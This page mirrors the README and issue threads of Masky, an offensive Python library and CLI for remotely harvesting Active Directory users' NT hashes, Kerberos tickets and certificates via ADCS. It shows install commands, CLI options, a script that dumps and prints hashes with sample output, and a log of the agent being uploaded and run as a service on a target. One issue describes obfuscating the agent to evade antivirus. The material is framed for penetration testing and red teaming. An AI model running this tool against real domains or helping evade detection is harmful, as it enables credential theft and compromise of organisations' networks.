Code Monkey home page Code Monkey logo

masky's Introduction

Masky

PyPI version Twitter

Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.

Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).

Installation

Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:

pip install masky

The Masky agent executable is already included within the PyPi package.

Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.

Masky CLI demo

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
 |  \/  | __ _ ___| | ___   _
 | |\/| |/ _` / __| |/ / | | |
 | |  | | (_| \__ \   <| |_| |
 |_|  |_|\__,_|___/_|\_\__,  |
  v0.0.3                 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
             [targets ...]

positional arguments:
  targets               Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
  -h, --help            show this help message and exit
  -v, --verbose         Enable debugging messages
  -ts, --timestamps     Display timestamps for each log
  -t THREADS, --threads THREADS
                        Threadpool size (max 15)

Authentication:
  -d DOMAIN, --domain DOMAIN
                        Domain name to authenticate to
  -u USER, --user USER  Username to authenticate with
  -p PASSWORD, --password PASSWORD
                        Password to authenticate with
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
  -H HASHES, --hashes HASHES
                        Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
                        Certificate Authority Name (SERVER\CA_NAME)

Results:
  -nh, --no-hash        Do not request NT hashes
  -nt, --no-ccache      Do not save ccache files
  -np, --no-pfx         Do not save pfx files
  -o OUTPUT, --output OUTPUT
                        Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky succesfully hijacked at least a user session
    # or if an unexpected error occured
    if not rslts:
        return False

    # Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generate the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
         - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
         - sec\askywalker - 8928e0723012a8471c0084149c4e23b1
         - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Standalone Masky agent

From the Masky version 0.0.5, the standalone executable agent can now easily be ran without the Python CLI.

Here are the arguments:

$> .\Masky.exe /ca:'CA SERVER\CA NAME' (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)

The /ca parameter is mandatory as for the Python CLI. Moreover, the /currentUser argument has been added to avoir running token impersonation. Indeed, a simple certificate request will be performed in the current user context, based on the provided template (template). The /output and /debug parameters allow to specify the path where will be created the files.

The default values are the following:

  • currentUser: false (aka. impersonation is enabled);
  • template: User;
  • output: ./Masky_results.txt
  • debug: ./Masky_debug.txt

Masky standalone agent demo

Acknowledgments

masky's People

Stargazers

avatar Jon Goss avatar avatar Vadim avatar Anis FARSI avatar avatar sparky avatar Psyray avatar avatar avatar TK avatar Max Rozendaal avatar avatar AVA avatar avatar Jacob Ebben avatar avatar David Barnett avatar PurpleWaveIO avatar Ethan Page avatar avatar Sissel avatar Coolfrog avatar avatar blacktraffic avatar avatar techris avatar avatar paranoid soul avatar avatar tudouya avatar avatar Mihai avatar avatar avatar BEWNIAC avatar Austin avatar avatar Deepak Nagarkoti avatar Hackass avatar avatar shira balali avatar avatar iChuckius avatar avatar Kibouo avatar Minoru Kobayashi avatar avatar avatar Benjamin Heise avatar H Mike avatar Jorge avatar avatar Jann Moon avatar Oleg Moshkov avatar Morgan Metz avatar i401 avatar Arkanix avatar Matis avatar Quentin Texier avatar Kasem Shibli avatar avatar avatar 观沧海 avatar avatar Maxime Catrice avatar Darktortue avatar Brother avatar Smiley the IT Guy avatar w00dyl3g avatar Evan avatar avatar avatar Shariq Malik avatar avatar Zaban avatar lapinou avatar avatar Alexandre Dulaunoy avatar Michael Taggart avatar avatar avatar Fab avatar avatar xedis avatar avatar Lucas Hennessy avatar avatar Mayfly avatar avatar avatar Nate Subra avatar avatar Joe Helle avatar unbaiat avatar avatar Nick Aliferopoulos avatar Roy Iversen avatar Michael Moran avatar avatar

Watchers

Andre Gironda avatar avatar Zak avatar Brother avatar avatar

Forkers

ceyhuncamli 3m1za4 silocityit int2ecall askyeye gl4ssesbo1 fengjixuchui zha0 socialsky-io gysf666 powerpress nanox baibainmb startagain2016 fuckgitb darksh3llru superuser5 nullcult rvrsh3ll pwnf slooppe 5m7x red-spect3r gavz apkc pdolinic freeide brother-x86 30579096 techris45 beerandgin dannymas defractal

masky's Issues

Wrong parameters how to debug ?

Hi,

trying to access the tool for future pentests after the nice podcast but so far no success (yet)

FYi : The host 192.168.16.4 has no AV

$masky -d timatec -u fbu -p 'xxx' -dc-ip 192.168.16.11 -ca "DC01.timatec.local\timatec-DC01-CA" 192.168.16.4 -v
...
[] Loading options...
[] 1 target(s) loaded
[o] Initialization of the threadpool (size: 1)
[o] (192.168.16.4) Start of target processing
[o] (192.168.16.4) The Masky agent binary will be uploaded in: \Windows\Temp\wydxnkqo.exe
[o] (192.168.16.4) The Masky agent output will be stored in: \Windows\Temp\kwkcqilt.jpg
[o] (192.168.16.4) The Masky agent errors will be stored in: \Windows\Temp\rxqgmhcr.png
[+] (192.168.16.4) Current user seems to be local administrator, attempting to run Masky agent...
[o] (192.168.16.4) Masky agent was successfuly uploaded in: '\Windows\Temp\wydxnkqo.exe'
[o] (192.168.16.4) The service 'ocrooivu' was successfuly created
[o] (192.168.16.4) The 'ocrooivu' was restarted for command execution
[×] (192.168.16.4) The provided CA server seems to be invalid or unreachable, please check its value
[o] (192.168.16.4) The 'ocrooivu' service binary path has been removed
[] (192.168.16.4) No user session was hijacked
[o] (192.168.16.4) End of target processing
[] Exiting...

I've used : -ca "DC01.timatec.local\timatec-DC01-CA"
From Certipy:
more 20221024092059_Certipy.txt
Certificate Authorities
0
CA Name : timatec-DC01-CA
DNS Name : DC01.timatec.local

Masky Agent - Sign Manifest when compiling

Problem

Currently, the Masky agent solution contains ClickOnce or some kind of certificate signing. When you clone the repo and try to compile the agent, the following error comes up:

Unable to find manifest signing certificate in the certificate store.

Solution

This can be fixed with

  1. Project Properties -> Signing -> Tick off Sign the ClickOnce manifests or, by
  2. Changing the .csproj file with
<PropertyGroup>
  <SignManifests>false</SignManifests>
</PropertyGroup>

I wasn't sure if this was intended or not. Also, if I were to make a PR to the agent code, is it okay for me to disable the ClickOnce manifest and then make the PR?

Seems some syntax broken in deb package

Hi, there

After updates to current release, in unpacking process founds that syntax problems= sounds not good with escapes.

python3-masky:
  Installed: 0.2.0-0kali1
  Candidate: 0.2.0-0kali1
  Version table:
 *** 0.2.0-0kali1 500
        500 http://http.kali.org/kali kali-rolling/main amd64 Packages
        500 http://http.kali.org/kali kali-rolling/main i386 Packages
        100 /var/lib/dpkg/status

There is unpack process

Setting up python3-masky (0.2.0-0kali1) ...
/usr/lib/python3/dist-packages/masky/core.py:108: SyntaxWarning: invalid escape sequence '\{'
  f"Start processing PFX of the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/core.py:112: SyntaxWarning: invalid escape sequence '\{'
  f"Fail to process gathered certificate related to the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/core.py:116: SyntaxWarning: invalid escape sequence '\{'
  f"End processing PFX of the user '{user_data.domain}\{user_data.name}'"
/usr/lib/python3/dist-packages/masky/lib/cert/auth.py:428: SyntaxWarning: invalid escape sequence '\{'
  f"Gathered NT hash for the user '{domain}\{username}': {nt_hash}"
/usr/lib/python3/dist-packages/masky/lib/smb.py:105: SyntaxWarning: invalid escape sequence '\{'
  err_msg = f"The user {self.__domain}\{self.__username} is not local administrator on this system"
/usr/lib/python3/dist-packages/masky/lib/smb.py:108: SyntaxWarning: invalid escape sequence '\{'
  err_msg = f"The provided credentials for the user '{self.__domain}\{self.__username}' are invalids or the user does not exist"
/usr/lib/python3/dist-packages/masky/lib/smb.py:295: SyntaxWarning: invalid escape sequence '\p'
  np_bind = f"ncacn_np:{target_host}[\pipe\svcctl]"
/usr/lib/python3/dist-packages/masky/ui/main.py:20: SyntaxWarning: invalid escape sequence '\/'
  """
/usr/lib/python3/dist-packages/masky/ui/options.py:164: SyntaxWarning: invalid escape sequence '\C'
  help="Certificate Authority Name (SERVER\CA_NAME)",

System.IO.FileNotFoundException: Could not load file or assembly

I needed to obfuscate Masky.exe to bypass antivirus. In file impersonate.cs I changed (redacted). This bypassed antivirus detection. :)

When I run the masky Python module with debugging enabled, or run Masky.exe directly on a target system, I get a lot of errors similar to the following:

System.IO.FileNotFoundException: Could not load file or assembly 'Interop.
CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or o
ne of its dependencies. The system cannot find the file specified.        
File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, Publi
cKeyToken=null'                                                           
   at Masky.Cert.CreateCertRequestMessage()                               
   at Masky.Cert.GetCertUser()                                            
   at Masky.Impersonate.ExecuteActionWithToken(Action action, IntPtr& Newh
ProcToken, IntPtr& currentProcHH, Boolean revert)

I don't get any errors if I simply run Masky.exe without any arguments. I don't really know if I broke Masky, or if it's an issue with the installed .Net version on the target systems.

OS info (target system):

OS Name:                   Microsoft Windows Server 2012 R2 Datacenter    
OS Version:                6.3.9600 N/A Build 9600

I checked the installed .Net versions (on the target system) and see the following:

C:\>reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
    Version    REG_SZ    4.8.03761
    CBS    REG_DWORD    0x1
    TargetVersion    REG_SZ    4.0.0
    Install    REG_DWORD    0x1
    Servicing    REG_DWORD    0x0
    Release    REG_DWORD    0x80eb1

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.